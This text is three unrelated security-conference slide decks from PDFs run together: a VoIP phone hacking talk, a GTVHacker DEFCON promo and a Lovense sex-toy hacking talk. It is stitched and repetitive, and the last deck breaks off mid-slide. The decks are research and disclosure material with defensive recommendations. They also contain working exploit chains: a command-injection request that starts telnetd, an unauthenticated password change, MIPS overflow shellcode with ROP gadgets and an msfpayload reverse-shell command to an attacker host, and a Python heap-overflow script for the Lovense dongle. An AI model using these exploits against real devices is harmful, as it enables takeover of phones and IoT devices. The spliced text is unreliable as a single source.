-H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) …
-H 'Accept: */*' -H 'Accept-Language: en-GB,en;q=0.5'
-H 'Referer: http://10.148.207.249/mainform.cgi/Monitoring.htm'
-H 'Authorization: Basic YWRtaW46c3VwZXJwYXNz' –H 'Connection: keep-alive' -H '' \
'http://10.148.207.249/command.cgi?ping%20-c%204%20127.0.0.1;/usr/sbin/telnetd'
idea, start telnetd
Attacker does not know credentials
Command Injection
97
Command injection in AudioCodes 405HD device:
Can we bypass the authorization?
curl -i -s -k -X 'GET' \
-H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) …
-H 'Accept: */*' -H 'Accept-Language: en-GB,en;q=0.5'
-H 'Referer: http://10.148.207.249/mainform.cgi/Monitoring.htm'
-H 'Authorization: Basic YWRtaW46c3VwZXJwYXNz' –H 'Connection: keep-alive' -H '' \
'http://10.148.207.249/command.cgi?ping%20-c%204%20127.0.0.1;/usr/sbin/telnetd'
idea, start telnetd
Attacker does not know credentials
Command Injection
98
Command injection in AudioCodes 405HD device:
Can we bypass the authorization?
curl -i -s -k -X 'GET' \
-H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) …
-H 'Accept: */*' -H 'Accept-Language: en-GB,en;q=0.5'
-H 'Referer: http://10.148.207.249/mainform.cgi/Monitoring.htm'
-H 'Authorization: Basic YWRtaW46c3VwZXJwYXNz' –H 'Connection: keep-alive' -H '' \
'http://10.148.207.249/command.cgi?ping%20-c%204%20127.0.0.1;/usr/sbin/telnetd'
idea, start telnetd
Attacker does not know credentials
NOPE !
Exploit for Auth Bypass
99
But look at “Change password” request:
curl -i -s -k -X
'POST'
\
-H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0)
Gecko/20100101 Firefox/39.0'
-H 'Pragma: no-cache' -H 'Cache-Control: no-cache'
-H 'Content-Type: application/x-www-form-urlencoded' -H 'Content-Length: 33'
-H 'Referer:http://10.148.207.249/mainform.cgi/System_Auth.htm' -H '' \
--data-binary $'NADMIN=admin&NPASS=pass&NCPASS=pass' \
'http://10.148.207.249/mainform.cgi/System_Auth.htm'
Exploit for Auth Bypass
100
But look at “Change password” request:
NO Authorization header!
NO old password parameter!
curl -i -s -k -X
'POST'
\
-H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0)
Gecko/20100101 Firefox/39.0'
-H 'Pragma: no-cache' -H 'Cache-Control: no-cache'
-H 'Content-Type: application/x-www-form-urlencoded' -H 'Content-Length: 33'
-H 'Referer:http://10.148.207.249/mainform.cgi/System_Auth.htm' -H '' \
--data-binary $'NADMIN=admin&NPASS=pass&NCPASS=pass' \
'http://10.148.207.249/mainform.cgi/System_Auth.htm'
Exploit for Auth Bypass
101
But look at “Change password” request:
NO Authorization header!
NO old password parameter!
curl -i -s -k -X
'POST'
\
-H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0)
Gecko/20100101 Firefox/39.0'
-H 'Pragma: no-cache' -H 'Cache-Control: no-cache'
-H 'Content-Type: application/x-www-form-urlencoded' -H 'Content-Length: 33'
-H 'Referer:http://10.148.207.249/mainform.cgi/System_Auth.htm' -H '' \
--data-binary $'NADMIN=admin&NPASS=pass&NCPASS=pass' \
'http://10.148.207.249/mainform.cgi/System_Auth.htm'
102
DEMO
Demo Time
Inside Outside
103
Internal attacker -> entry point
csrf
Open to internet -> Shodan map
Default creds
End technical part
Shit Happens !
Stack Based Buffer Overflow (MIPS)
104
Request changing password on Htek - UC902:
curl -i -s -k -X 'GET'
… -H 'Authorization: Basic YWRtaW46YWRtaW4=' –H … -H ''
'http://192.168.2.107/hl_web/cgi_command=setSecurityPasswortaaaabaaacaaadaaaeaaafaaagaaahaaaia
aajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabg'
Stack Based Buffer Overflow (MIPS)
105
Request changing password on Htek - UC902:
Internal code:
curl -i -s -k -X 'GET'
… -H 'Authorization: Basic YWRtaW46YWRtaW4=' –H … -H ''
'http://192.168.2.107/hl_web/cgi_command=setSecurityPasswortaaaabaaacaaadaaaeaaafaaagaaahaaaia
aajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabg'
handle_cgi_command(undefined4 param_1, undefined4 param_2, undefined4 param_3, char *cgi_param) {
char targetBuffer [32];
…
memset(targetBuffer,0,0x20);
iVar1 = strncmp(cgi_param, "/hl_web/cgi_command=", 0x14);
if (iVar1 == 0) {
CopyToCommandStr(targetBuffer, cgi_param + 0x14);
...
Stack Based Buffer Overflow (MIPS)
106
Request changing password on Htek - UC902:
Internal code:
curl -i -s -k -X 'GET'
… -H 'Authorization: Basic YWRtaW46YWRtaW4=' –H … -H ''
'http://192.168.2.107/hl_web/cgi_command=setSecurityPasswortaaaabaaacaaadaaaeaaafaaagaaahaaaia
aajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabg'
handle_cgi_command(undefined4 param_1, undefined4 param_2, undefined4 param_3, char *cgi_param) {
char targetBuffer [32];
…
memset(targetBuffer,0,0x20);
iVar1 = strncmp(cgi_param, "/hl_web/cgi_command=", 0x14);
if (iVar1 == 0) {
CopyToCommandStr(targetBuffer, cgi_param + 0x14);
...
Stack Based Buffer Overflow (MIPS)
107
handle_cgi_command(undefined4 param_1, undefined4 param_2, undefined4 param_3, char *cgi_param) {
char targetBuffer [32];
…
memset(targetBuffer,0,0x20);
iVar1 = strncmp(cgi_param, "/hl_web/cgi_command=", 0x14);
if (iVar1 == 0) {
CopyToCommandStr(targetBuffer, cgi_param + 0x14);
...
…
void CopyToCommandStr(char *target, char *input) {
char *local_target = target;
char *local_input = input ;
while ((*local_input != '(' && (*local_input != 0))) {
*local_target = *local_input;
local_target = local_target + 1;
local_input = local_input + 1;
}
return;
}
Stack Based Buffer Overflow (MIPS)
108
handle_cgi_command(undefined4 param_1, undefined4 param_2, undefined4 param_3, char *cgi_param) {
char targetBuffer [32];
…
memset(targetBuffer,0,0x20);
iVar1 = strncmp(cgi_param, "/hl_web/cgi_command=", 0x14);
if (iVar1 == 0) {
CopyToCommandStr(targetBuffer, cgi_param + 0x14);
...
…
void CopyToCommandStr(char *target, char *input) {
char *local_target = target;
char *local_input = input ;
while ((*local_input != '(' && (*local_input != 0))) {
*local_target = *local_input;
local_target = local_target + 1;
local_input = local_input + 1;
}
return;
}
stop criteria filling the buffer
Control $ra
109
------------------------------------------------------------------- registers ----
…
$s8 : 0x61616265 ("aabe"?)
$pc
: 0x0080a9b4 -> 0x27bd00a8
$sp
: 0x7cffb498 -> 0x00d89c48 -> 0x2a2a2a2a ("****"?)
…
$ra
: 0x61616266 ("aabf"?)
$gp
: 0x00e42900 -> 0x00000000
------------------------------------------------------------ code:mips:MIPS32 ----
…
-> 0x80a9b4 addiu
sp, sp, 168
0x80a9b8 jr
ra
0x80a9bc nop
…
---------------------------------------------------------------------------------------------
gef> x/60wx $sp
0x7cffb498:
0x00d89c48
0x7cffb4b4
0x00000000
0x00000000
…
0x7cffb528:
0x6161617a
0x61616262
0x61616263
0x61616264
0x7cffb538:
0x61616265
0x61616266
0x61616267
0xffffffff
…
gef>
we control
we control
jump to (return) address in register (we control)
stack
$s8
$ra
Exploit Development, Challenges
110
How to bypass NX protection, ASLR, …?
Exploit Development, Challenges
111
How to bypass NX protection, ASLR, …?
Generate shell code and put it onto the stack e.g.
gef> checksec
[+] checksec for '/tmp/gef/265//bin/voip'
Canary
: No
NX : No
PIE : No
Fortify
: No
RelRO
: No
msfpayload linux/mipsbe/shell_reverse_tcp lport=4444 lhost=192.168.2.102
Exploit Development, Challenges
112
How to find the stack address with our shell code?
…
0x7ff22000 0x7ff37000 0x00000000 rwx [stack]
…
…
0x7fc58000 0x7fc6d000 0x00000000 rwx [stack]
…
vs.
Exploit Development, Challenges
113
How to find the stack address with our shell code?
Find gadgets in libc to load stack address into a register:
…
0x7ff22000 0x7ff37000 0x00000000 rwx [stack]
…
…
0x7fc58000 0x7fc6d000 0x00000000 rwx [stack]
…
vs.
x/4i 0x2AE3EEE8
0x2ae3eee8 <wcwidth+40>:
addiu
a0,sp,32
0x2ae3eeec <wcwidth+44>:
lw
ra,28(sp)
0x2ae3eef0 <wcwidth+48>:
jr
ra
0x2ae3eef4 <wcwidth+52>:
addiu
sp,sp,32
x/4i 0x2AE5B9BC
0x2ae5b9bc <xdr_free+12>:
move
t9,a0
0x2ae5b9c0 <xdr_free+16>:
sw
v0,24(sp)
0x2ae5b9c4 <xdr_free+20>:
jalr
t9
0x2ae5b9c8 <xdr_free+24>:
addiu
a0,sp,24
“write “ stack pointer + 32 to register $a0
jump to next gadget
move $a0 to $t9
jump to value in $t9 = $a0 = $sp + 32
Exploit Development, Challenges
114
How to handle bad chars?
0x00, 0x09, 0x0a, 0x0d, 0x20, 0x23, 0x28, 0x29, 0x5b, 0x5d, 0x2f2f
Exploit Development, Challenges
115
How to handle bad chars?
Write/use an encoder/encryption*:
0x00, 0x09, 0x0a, 0x0d, 0x20, 0x23, 0x28, 0x29, 0x5b, 0x5d, 0x2f2f
*https://www.vantagepoint.sg/papers/MIPS-BOF-LyonYang-PUBLIC-FINAL.pdf
# Load decimal value 99999999 into register $s2
li $s1, 2576980377
la $s2, 1000($sp) // Copy Stack Pointer Address + 1000 bytes into register $s2
addi $s2, $s2, -244 // Adjust Register $s2 (address location) by -244
lw $t2, -500($s2) // Get value located at register $s2 – 500 bytes and store into $t2
# XOR value stored at $t2 and $s1 and store it into register $v1
xor $v1, $t2, $s1
# Replace value back to stack ($s2 – 500) with new XORed value ($v1).
sw $v1, -500($s2)
Exploit Structure
116
Payload structure:
Padding
AAA...A
Gadget 1
address
$a0 = $sp +32
Gadget 2
address
$t9 = $a0
jump to $t9
Decoder
assembly
xor with 99999999
Shellcode
assembly
Execute /bin/sh
modify code
Exploit Development, Another Challenges
117
Memory (Stack)
…
addi $a0, $t7, -3
addi $a1, $t7, -3
…
Instruction Cache
…
addi $a0, $t7, -3
addi $a1, $t7, -3
…
Data Cache
…
addi $a0, $t7, 5
addi $a1, $t7, 5
…
Processor
Core
Exploit Development, Another Challenges
118
Memory (Stack)
…
addi $a0, $t7, -3
addi $a1, $t7, -3
…
Instruction Cache
…
addi $a0, $t7, -3
addi $a1, $t7, -3
…
Data Cache
…
addi $a0, $t7, 5
addi $a1, $t7, 5
…
Processor
Core
Solving Caching Problem
119
Trigger cache flush:
Call sleep syscall to trigger cache flush
Find, call cache flush (__clear_cache) function
Build shellcode avoiding bad char:
Use assembly instruction without 0 bytes and bad char bytes
Hardcoded encoded values, decode at runtime
MIPS Examples
120
Set a parameter value (to zero):
Semantic
Mnemonic
Assembly
$a0 = 2
li $a0, 2
\x24\x04\x00\x02
$t7 = 0 – 6 = -6
$t7 = not(-6) = 5
$a0 = $t7 – 3 = 5 - 3 = 2
addiu $t7, $zero, -6
not $t7, $t7
addi $a0, $t7, -3
\x24\x0f\xff\xfa\x01
\xe0\x78\x27\x21\xe4
\xff\xfd
MIPS Examples
121
Set a parameter value (to zero):
Semantic
Mnemonic
Assembly
$a0 = 2
li $a0, 2
\x24\x04\x00\x02
$t7 = 0 – 6 = -6
$t7 = not(-6) = 5
$a0 = $t7 – 3 = 5 - 3 = 2
addiu $t7, $zero, -6
not $t7, $t7
addi $a0, $t7, -3
\x24\x0f\xff\xfa\x01
\xe0\x78\x27\x21\xe4
\xff\xfd
Semantic
Mnemonic
Assembly
$a2 = 0
li $a2, 0
\x24\x04\x00\x00
$a2 = $t7 xor $t7 = 0
Xor $a2, $t7, $t7
\x01\xef\x30\x26
MIPS Examples
122
Handle “strings” and critical chars:
Semantic
Mnemonic
Assembly
$t7 = //bi
lui $t7, 0x2f2f
ori
$t7, $t7, 0x6269
\x3c\x0f\x2f\x2f\x35
\xef\x62\x69
$t4 = 0xb6b6fbf0
$t6 = 99999999
$t7 = $t4 xor $t6 = 0x2f2f6269 = //bi
li $t4, 0xb6b6fbf0
li $t6, 2576980377
xor $t7, $t4, $t6
\x3c\x0c\xb6\xb6\x35
\x8c\xfb\xf0\x3c\x0e
\x99\x99\x35\xce\x99
\x99\x01\x8e\x78\x26
Final Shellcode
123
\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff
\xfd\x21\xe5\xff\xfd\x01\xef\x30\x26\x24\x02
\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff\x8f
\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27
\xaf\xaf\xff\xe0\x3c\x0e\x11\x5c\x35\xce\x11
\x5c\xaf\xae\xff\xe4\x3c\x0e\xc0\xa8\x35\xce
\x02\x66\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24
\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a
\x01\x01\x01\x0c\x8f\xa4\xff\xff\x24\x0f\xff
\xfa\x01\xe0\x78\x27\x21\xe5\xff\xfb\x24\x02
\x0f\xdf\x01\x01\x01\x0c\x21\xe5\xff\xfc\x24
\x02\x0f\xdf\x01\x01\x01\x0c\x21\xe5\xff\xfd
\x24\x02\x0f\xdf\x01\x01\x01\x0c\x01\xef\x30
\x26\x3c\x0c\xb6\xb6\x35\x8c\xfb\xf0\x3c\x0e
\x99\x99\x35\xce\x99\x99\x01\x8e\x78\x26\xaf
\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce\x73\x68
\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff
\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5
\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c
our shellcode
Assembly – Big Endian
124
Demo Time
Device Overview
Vendor
Device
FW
Finding
CVE
Alcatel-Lucent
8008 CE
1.50.03
CVE-2019-14259
Akuvox
R50
50.0.6.156
CVE-2019-12324
CVE-2019-12326
CVE-2019-12327
Atcom
A11W
2.6.1a2421
CVE-2019-12328
AudioCodes
405HD
2.2.12
CVE-2018-16220,
CVE-2018-16219
CVE-2018-16216
Auerswald
COMfortel 2600 IP
2.8D
Auerswald
COMfortel 1200 IP
3.4.4.1
CVE-2018-19977
CVE-2018-19978
Avaya
J100
4.0.1
Cisco
CP-7821
11.1.2
Digium
D65
2.7.2
Fanvil
X6
1.6.1
Gigaset
Maxwell Basic
2.22.7
CVE-2018-18871
https://www.sit.fraunhofer.de/cve/
Vendor
Device
FW
Finding
CVE
Grandstream
DP750
1.0.3.37
Htek
UC902
2.6.1a2421
CVE-2019-12325
Huawei
eSpace 7950
V200R003C
30SPCf00
CVE-2018-7958
CVE-2018-7959
CVE-2018-7960
Innovaphone
IP222
V12r2sr16
Mitel
6865i
5.0.0.1018
RIP
Obihai
6.3.1.0
5.1.11
CVE-2019-14260
Panasonic
KX-TGP600
06.001
Polycom
VVX 301
5.8.0
Samsung
SMT-i6010
1.62
Univy
CP200
V1 R3.8.10
Yealink
SIP-T41P
66.83.0.35
CVE-2018-16217
CVE-2018-16218
CVE-2018-16221
125
Vulnerability Overview
126
Real World
127
Recommendations for Users/Admins
128
Change default credentials
Update your VoIP phone
Disable servers (Web, SSH, Telnet, etc…) if possible and not needed
Network protection measures for phones
…
Recommendations for Developers
129
Process separation and isolation
Compile flags: ASLR, NX protection, Canaries, etc.
No hardcoded keys, and/or self-made crypto
No default credentials enforce change at first start
Convenient update mechanism
Lessons Learned?
1992
Linux OS, multi user
130
Lessons Learned?
1992
Linux OS, multi user
1996
“Smashing The Stack
For Fun And Profit“
131
Lessons Learned?
1992
Linux OS, multi user
1996
“Smashing The Stack
For Fun And Profit“
2000-2004
NX protection, ASLR
132
Lessons Learned?
1992
Linux OS, multi user
1996
“Smashing The Stack
For Fun And Profit“
2000-2004
NX protection, ASLR
2007
iPhone, all apps run as root
133
Lessons Learned?
1992
Linux OS, multi user
1996
“Smashing The Stack
For Fun And Profit“
2000-2004
NX protection, ASLR
2007
iPhone, all apps run as root
2010/2011
iOS 4 / Android 4 ASLR
134
Lessons Learned?
1992
Linux OS, multi user
1996
“Smashing The Stack
For Fun And Profit“
2000-2004
NX protection, ASLR
2007
iPhone, all apps run as root
2010/2011
iOS 4 / Android 4 ASLR
NÕW
Security in VoIP
135
Lessons Learned?
1992
Linux OS, multi user
1996
“Smashing The Stack
For Fun And Profit“
2000-2004
NX protection, ASLR
2007
iPhone, all apps run as root
2010/2011
iOS 4 / Android 4 ASLR
NÕW
Security in VoIP
136
137
Somthing went wrong
Responsible Disclosure
138
Informed all vendors, 90 days to fix the bugs
Reactions:
“Why investigating our poor phones”?
“We bought phone from other vendor, we cannot fix it”
“It’s not supported anymore”
“...” – “We are going to publish” – “We will fix immediately”
In the end, most vendors (2 did not react) fixed the vulnerabilities
Summary
139
Investigated 33 VoIP phones
Found 40 vulnerabilities and registered 16 CVEs
A lot of old technology is out there, new models getting better
Some vendors switch to Android, seems to be more robust but
new types of vulnerabilities Apps on your VoIP phone?
We don’t know what will be next after IoT, but there will be a root
process and memory corruption ;-)
140
141
Stephan Huber
Email: [email protected]
Philipp Roskosch
Email: [email protected]
Web: https://www.team-sik.org
Email: [email protected]
Findings: https://www.sit.fraunhofer.de/cve
Contact | pdf |
A"GTVHACKER"LLC"PRODUCTION"
GTVHACKER"PRESENTS:
GTVHacker"
• Formed'to'root'the'original'
Google'TV'in'2010'
• Released'exploits'for'every'
Google'TV'device'
• Plus'some'others:'
Chromecast,'Roku,'Nest'
• Many'more'to'come!''
Speaking"Members"
Amir"Etemadieh"(Zenofex)"–'Research'ScienHst'at'Accuvant'LABS,'
founded'GTVHacker'"
CJ"Heres"(cj_000)"–'Security'Researcher'/'Group'Head,'
Technology'Development'[somewhere]''
Hans"Nielsen"(AgentHH)"–'Senior'Security'Consultant'at'
Matasano''
Mike"Baker"([mbm])"–'Firmware'developer,'OpenWRT'coT
founder'
Members"
gynophage"–"He's'(again)'running'a'liXle'thing'called'the'
DEFCON'CTF'right'now''
Jay"Freeman"(saurik)"–"Creator'of'Cydia''
Khoa"Hoang"(maximus64)"–""█████ ███!
Tom"Dwenger"(tdweng)"–'Excellent'with'APK'reversing'and'
anything'Java''
Why"Hack"ALL"The"Things?"
• We'own'the'hardware,'why'
not'the'so\ware?''
• Give'new'life'to'abandoned'
hardware''
• Make' the' products' more'
awesome''
• We'enjoy'the'challenge''
Takeaways"
• You'get'a'root!'
• You'get'a'root!'
• You'get'a'root!'
• Everybody'gets'a'
root!'
Learning'is'awesome,'but'this'presentaHon'is'about'the'bugs'
Avenues"Of"A\ack"
A\acks"Redacted"
No'early'freebies!''
We're'releasing'at'DEFCON'22!'
Saturday,'August'9th'at'10am'T'Track'1'
Updated'slides'and'files'will'be'published'here:'
hXp://DC22.GTVHACKER.COM'
Demo"
4'minutes,'20'devices,'1'special'guest'
Welcome'DUAL'CORE!'
“All'The'Things”''
Dual'Core'CD's'are'available'in'the'DEFCON'vendor'area'
Ques^ons"
We’ll'be'doing'a'Q&A'a\er'the'talk'at:'
TBD'
Thank"You"
Slide resources can be found at:
http://DC22.GTVHacker.com/
WIKI: http://www.GTVHacker.com
FORUM: http://forum.GTVHacker.com
BLOG: http://blog.GTVHacker.com
IRC: irc.freenode.net #GTVHacker
Follow us on Twitter: @GTVHacker
Also,'a'big'thank'you'to:'
DEFCON'and'Dual'Core' | pdf |
Adventures in buttplug
penetration (testing)
@smealum
Intro to teledildidonics
Word of the day
teledildonics /ˈtelədildōäniks/
From the Greek têle, meaning “afar”, and the English dildo, meaning “dildo”.
Use scenario 1: solo play
Use scenario 2: local co-op
Use scenario 3: remote co-op
Internet
Use scenario 3b: remote paid co-op
Internet
Compromise scenario 1: local hijack
Internet
Compromise scenario 2: remote hijack
Internet
Compromise scenario 3: reverse remote hijack
The Lovense Hush
The Lovense Hush
• “The World’s First Teledildonic Butt Plug”
• It’s a buttplug
• You can control it from your phone
• iOS or Android
• You can control it from your computer
• Windows or Mac OS
• App includes social features
• Chat (text, pictures, video)
• Share toy control with friends or strangers
The Lovense ecosystem
Lovense Remote App
Toys
USB dongle
BLE
Internet
USB
Lovense compromise map
Compromise
scenario #1
Compromise
scenario #2
Compromise
scenario #3
BLE
Internet
USB
Where to start?
?
?
No code/binaries
available
No code/binaries
available
Binaries available
for download
Binaries available
for download
Lovense remote
Requires a lovense account
Long distance play mode
Local play control mode
Runs on both Windows and
Mac OS, so of course it’s
electron-based
=> We just need to read some
slightly obfuscated JavaScript
Lovense remote: the dongle protocol
...
var t = new l.SerialPort(i.comName, {
baudRate: e.dongleBaudRate.baudRate,
dataBits: 8,
parity: "none",
stopBits: 1,
flowControl: !1
});
...
Lovense Remote: app.js
• The app is all written in JavaScript
• The code is somewhat obfuscated,
but field names are still present
• Throw it in a beautifier and you
can get a good idea of what’s going
on with little effort…
• For example: search for “dongle”,
and find the following
=> app and dongle talk over serial
• We can easily sniff serial traffic
• Two types of commands
• Simple: “DeviceType;”
• Complex: encoded as JSON
• Same with dongle responses
• After DeviceType, they’re all JSON
• Responses are read 32 bytes at a time
=> Do the dongle and toy’s firmware
include a JSON parser? 🤔
Messages sent to dongle
Messages received back from dongle
Lovense remote: the dongle protocol
• Easy to replicate basic app
functionality in python
• Convenient for testing
• Very simple protocol
Lovense remote: the dongle protocol
# open port
p = serial.Serial("COM3", 115200, timeout=1, bytesize=serial.EIGHTBITS,
parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE)
# get device type
p.write(b"DeviceType;\r\n")
deviceType = p.readline()
# search for toys (we already know our toy's MAC though)
p.write(b'{"type":"toy","func":"search"}\r\n’); print(p.readline());
p.write(b'{"type":"toy","func":"statuss"}\r\n’); print(p.readline());
p.write(b'{"type":"toy","func":"stopSearch"}\r\n’); print(p.readline());
# connect to toy
p.write(b'{"type":"toy","func":"connect","eager":1,"id":"899208080A0A"}\r\n')
print(p.readline())
# try various commands
p.write(b'{"type":"toy","func":"command","id":"899208080A0A","cmd":"DeviceType;"}\r\n')
print(p.readline())
p.write(b'{"type":"toy","func":"command","id":"899208080A0A","cmd":"Battery;"}\r\n')
print(p.readline())
p.write(b'{"type":"toy","func":"command","id":"899208080A0A","cmd":"Vibrate:20;"}\r\n')
print(p.readline())
Lovense remote: the dongle protocol
...
this.updateUrl = _configServer.LOGIN_SERVICE_URL +
"/app/getUpdate/dfu?v="
this.filename = "src/update/dongle.zip"
this.exePath = "src\\update\\nrfutil.exe"
...
t.downloadFile(this.updateUrl + e, t.filename, ...)
...
dfu: "DFU;",
oldDongleDFU: {
type: "usb",
cmd: "DFU"
}
Lovense Remote: app.js
• JSON means parsing code which
means firmware bugs
• But finding bugs without the code
is annoying…
• Search app.js for “update”…
• …and find what we want ☺
• DFU = Device Firmware Update
• URL gives us a binary to analyze
Lovense USB dongle firmware
d1071.zip from Lovense
• The file we get is a zip
• Two binary blob
• One JSON file
• None of it is encrypted
• Nothing that looks like a base
address or anything in metadata,
mostly just looks like versioning
• Big blob looks like thumb-mode
ARM, so IDA to the rescue…
Metadata
Firmware blob
void processLatestCommand()
{
if ( receivedCommand_ == 1 )
{
if ( !processSimpleCommands_(latestCommand_) )
{
processComplexCommands_(latestCommand_);
}
}
}
bool processSimpleCommands_(char *a1)
{
if ( memcmp(a1, "DFU;", 4u) )
{
if ( !memcmp(a1, "RESET;", 6u) )
{
sendHostMessage_("OK;");
SYSRESETREQ();
}
if ( memcmp(a1, "DeviceType;", 0xBu) )
{
if ( memcmp(a1, "GetBatch;", 9u) ) return 0;
sendHostMessage_("%02X%02X%02X;\n",
batch0, batch1, batch2, batch3);
}else{
sendHostMessage_("%s:%s%s:%02X%02X%02X%02X%02X%02X;\n",
"D", "1", "05", deviceMac0, deviceMac1, deviceMac2,
deviceMac3, deviceMac4, deviceMac5);
}
}else{
sendHostMessage_("OK;");
initiateDfu_();
}
return 1;
}
void processComplexCommands_(char *cmd)
{
jsonNode_s* node = parseJsonFromString_(cmd);
if ( !node )
{
sendHostError("402");
return;
}
attribute_type = getJsonAttributeByName(node, "type");
...
}
Lovense USB dongle firmware: DFU command & JSON parser
Lovense USB dongle firmware: JSON parser
• Don’t know if parser is open-source or
in-house
• What I do know is it’s buggy ☺
• parseJsonString
• Parses member strings
• Handles escape characters
• Copies strings into the heap
• Can turn this into an arbitrary write
• Corrupting heap metadata lets us place
the next string at an arbitrary location
• No ASLR => we’re good to go
while ( 1 )
{
curcar_strlen = *cursor_strlen;
if ( curcar_strlen == '“’ ) break;
if ( !*cursor_strlen ) break;
++string_length;
if ( !string_length ) break;
++cursor_strlen;
if ( curcar_strlen == '\\’ ) ++cursor_strlen;
}
string_buffer = malloc(string_length + 1);
...
while ( 1 )
{
if ( *cursor == '"' || !*cursor ) break;
if ( *cursor == '\\’ )
{
if ( cursor[1] == 'u’ )
{
sscanf(&cursor[2], "%4x", &unicode_val);
cursor += 4;
...
}
}
...
Assumes escapes
only skip one
character…
…but they can
actually skip way
more than one
• This is great, but we still don’t know what
hardware the dongle is running
• We know no ASLR, no stack cookies, but maybe
there’s DEP/XN?
• Based on NRF51822 SoC
• Cortex-M0, 256KB flash, 16KB ram
• No DEP
• Includes BLE-capable radio
• Very popular for low power BLE devices
• Can be debugged over SWD if not factory disabled
Lovense USB dongle: hardware
Exposed SWD test points
Debugging the dongle
• This is great, but we still don’t know what
hardware the dongle is running
• We know no ASLR, no stack cookies, but maybe
there’s DEP/XN?
• Based on NRF51822 SoC
• Cortex-M0, 256KB flash, 16KB ram
• No DEP
• Includes BLE-capable radio
• Very popular for low power BLE devices
• Can be debugged over SWD if not factory disabled
Lovense USB dongle: hardware
Debugging the dongle
Lovense USB dongle crash
# use heap-based buffer overflow to corrupt heap metadata...
bugdata = b"\u" + bytes([0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
0x78, 0x46, 0x5c, 0x00, 0x20])
bugdata = b'{"type":"toy","test":"' + bugdata + b'"}\r\n'
p.write(bugdata)
print(p.readline())
bugdata = b"\u" + bytes([0x00, 0x01, 0x02, 0x03, 0x04,
0x5c, 0x00, 0x5c, 0x00])
bugdata = b'{"type":"toy","test":"' + bugdata + b'"}\r\n'
p.write(bugdata)
print(p.readline())
# send string data that will be allocated at 0x20004678 and smash the stack
bugdata = b"a" * 0x300
bugdata = b'{"type":"toy","test":"' + bugdata + b'"}\r\n'
p.write(bugdata)
• Unfortunately, toy doesn’t respond to JSON
• It does share simple commands with dongle
• DeviceType; is sent to both dongle and toy
• What about DFU;?
• Definitely has an effect
• Causes the dongle to become unresponsive…
• …and to disconnect from UART 🤔
Lovense USB dongle: DFU
• We already know dongle DFU is possible
• The app does it when you plug in a new dongle
• …we downloaded a DFU package from their server
• But what kind of authentication does it use?
• Let’s check the metadata for a signature…
• The only thing even close to authentication is…
a CRC16
Lovense USB dongle: DFU
{
"manifest": {
"application": {
"bin_file": "main.bin",
"dat_file": "main.dat",
"init_packet_data": {
"application_version": 4294967295,
"device_revision": 65535,
"device_type": 65535,
"firmware_crc16": 8520,
"softdevice_req": [
65534
]
}
},
"dfu_version": 0.5
}
}
manifest.json
Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D
00000000 FF FF FF FF FF FF FF FF 01 00 FE FF 48 21
main.dat
main.bin
• Can we just modify main.bin, recalculate
its CRC16 and flash it using the program
included in Lovense Remote?
• Yes
• Since “DFU;” affects the plug too,
maybe we can reflash its firmware too
• But we don’t have a base firmware image…
so need to take a look under the hood
Lovense USB dongle: DFU
main.bin
Serial port sniffer
BLE
Internet
USB
Lovense compromise map
Computer can compromise dongle over USB serial
• The Hush is based off the NRF528322
• Cortex M4, 512KB flash, 64KB ram
• Basically supercharged NRF58122
• We can easily locate things that weren’t
on the dongle…
• …and things that were
• The Hush has working SWD test points
• Thanks to this, we can just dump the
firmware over SWD
Lovense Hush: hardware
Power
Motor
Antenna
Charger port
SWD test points
• The Hush is based off the NRF528322
• Cortex M4, 512KB flash, 64KB ram
• Basically supercharged NRF58122
• We can easily locate things that weren’t
on the dongle…
• …and things that were
• The Hush has working SWD test points
• Thanks to this, we can just dump the
firmware over SWD
Lovense Hush: hardware
Power
Motor
Antenna
Charger port
SWD test points
• Quick RE confirms no JSON parser
• Only “simple” commands, but a lot of them
• Searching for “DFU” turns up two things
• “DFU;” command handler, as expected
• “DfuTarg” string in bootloader region
• “DfuTarg” is used the same as “LVS-Z001”
• Makes it look like it’s the bootloader’s BLE
DFU mode
Lovense Hush: firmware
add
r1, pc, #0xe8 ; (adr r1, "DfuTarg")
bic.w
r0, r0, #0xf
adds
r0, r0, #1
bic.w
r0, r0, #0xf0
adds
r0, #0x10
strb.w r0, [sp, #8]
movs
r2, #7
add
r0, sp, #8
svc 0x7c
add
r1, pc, #0x58 ; (adr r1, "LVS-Z001")
bic.w
r0, r0, #0xf
adds
r0, r0, #1
bic.w
r0, r0, #0xf0
adds
r0, #0x10
strb.w r0, [sp, #8]
movs
r2, #8
add
r0, sp, #8
svc 0x7c
0x7D4F6:
0x21646:
Sure enough…
• Can we just modify main.bin,
recalculate its CRC16 and flash
it using the Nordic DFU app?
• Yes
Lovense Hush: DFU
firmware.bin
Wireshark
…
BLE
Internet
USB
Lovense compromise map
Computer can compromise dongle over BLE
(from dongle or just any other BLE device)
• on(”data”) does a little processing and passes
the string to processData
• processData just throws the string into
JSON.parse…
• We just saw that JSON parser bugs are a thing…
but realistically V8’s parser is much more robust
• There have been bugs in its JSON engine like CVE-
2015-6764, but in stringify, not parse
